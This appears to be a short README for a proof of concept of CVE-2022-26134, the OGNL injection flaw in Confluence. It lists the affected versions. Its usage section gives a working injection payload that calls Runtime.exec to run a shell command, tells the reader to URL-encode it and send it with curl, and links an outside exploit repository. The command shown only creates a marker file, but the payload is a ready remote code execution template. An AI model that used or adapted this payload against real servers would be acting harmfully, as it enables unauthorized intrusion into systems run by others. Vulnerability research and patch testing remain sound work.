24 lines
558 B
Markdown
24 lines
558 B
Markdown
|
# CVE-2022-26134
|
||
|
|
||
|
* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
|
||
|
* Confluence versions:
|
||
|
* 1.3.0 to 7.4.17
|
||
|
* 7.13.0 to 7.13.7
|
||
|
* 7.14.0 to 7.14.3
|
||
|
* 7.15.0 to 7.15.2
|
||
|
* 7.16.0 to 7.16.4
|
||
|
* 7.17.0 to 7.17.4
|
||
|
* 7.18.0 to 7.18.1
|
||
|
* Object Graph Navigation Language (OGNL)
|
||
|
|
||
|
## Usage
|
||
|
|
||
|
* Payload is a GET request which is set via the URI
|
||
|
```sh
|
||
|
${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
|
||
|
```
|
||
|
* URL encode and curl for PoC
|
||
|
|
||
|
* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)
|
||
|
|